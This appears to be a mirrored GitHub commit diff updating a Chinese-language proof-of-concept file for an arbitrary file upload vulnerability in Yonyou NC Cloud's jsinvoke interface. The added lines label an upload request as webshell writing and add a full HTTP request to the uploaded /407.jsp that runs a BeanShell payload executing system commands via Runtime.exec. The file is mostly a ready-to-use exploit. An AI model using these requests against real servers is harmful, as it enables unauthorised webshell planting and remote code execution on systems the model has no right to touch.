mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Update 用友 NC Cloud jsinvoke 任意文件上传漏洞.md
This commit is contained in:
parent
2b66a29dff
commit
401716eba0
@ -3,6 +3,7 @@
|
||||
用友 NC Cloud jsinvoke 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件至服务器中,获取系统权限
|
||||
app="用友-NC-Cloud"
|
||||
|
||||
## 写入webshell
|
||||
```
|
||||
POST /uapjs/jsinvoke/?action=invoke
|
||||
Content-Type: application/json
|
||||
@ -40,3 +41,23 @@ Content-Type: application/x-www-form-urlencoded
|
||||
}
|
||||
|
||||
```
|
||||
|
||||
## 执行命令
|
||||
```
|
||||
|
||||
POST /407.jsp?error=bsh.Interpreter HTTP/1.1
|
||||
Host: *
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
|
||||
Accept: */*
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Cookie: JSESSIONID=80DA93FB2FFF0204E78FA82643D5BC6E
|
||||
If-Modified-Since: Fri, 09 Dec 2022 16:12:59 GMT
|
||||
If-None-Match: W/"370397-1670602379000"
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 96
|
||||
|
||||
cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
|
||||
```
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user